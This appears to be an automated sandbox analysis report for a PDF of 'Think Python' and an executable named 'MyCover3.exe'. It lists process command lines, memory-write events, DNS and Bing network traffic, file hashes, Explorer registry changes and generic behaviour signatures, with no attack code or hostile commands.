PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

Processes

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).pdf"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=33AA3F51A14EA4A6C574B6C1C6A2EB55 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A0DCC9E1456A78D09C5F5A19746463AE --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A0DCC9E1456A78D09C5F5A19746463AE --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=33EBFC6C22B45F0116002F467686AA01 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=37B050BF2611695849BF8C768AB2875B --mojo-platform-channel-handle=2416 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DDDCE9C5946990EF023C98F08E364A92 --mojo-platform-channel-handle=1952 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D68E1A1A1BD3075D9F09F3948916AA09 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D68E1A1A1BD3075D9F09F3948916AA09 --renderer-client-id=7 --mojo-platform-channel-handle=2300 --allow-no-sandbox-job /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 144.96.55.23.in-addr.arpa udp
US 8.8.8.8:53 59.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 c4b1b7f7953c859543fab249c14664b8
SHA1 b6826c3ec038238834617a0206535a038ff6469f
SHA256 44917e4f454077cf7c33514516d3931acd7a33915cea3eb923f2d1e868b6ab19
SHA512 91a317cf9725c0352d7e5158cc6e27df02505539290942275cd52ea5cea1a8dea41b34887c940ddb67b648cfe4bea8c170f06853467ddb278ee4f857db75ee38

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-12 05:58

Reported

2024-06-12 06:00

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe N/A
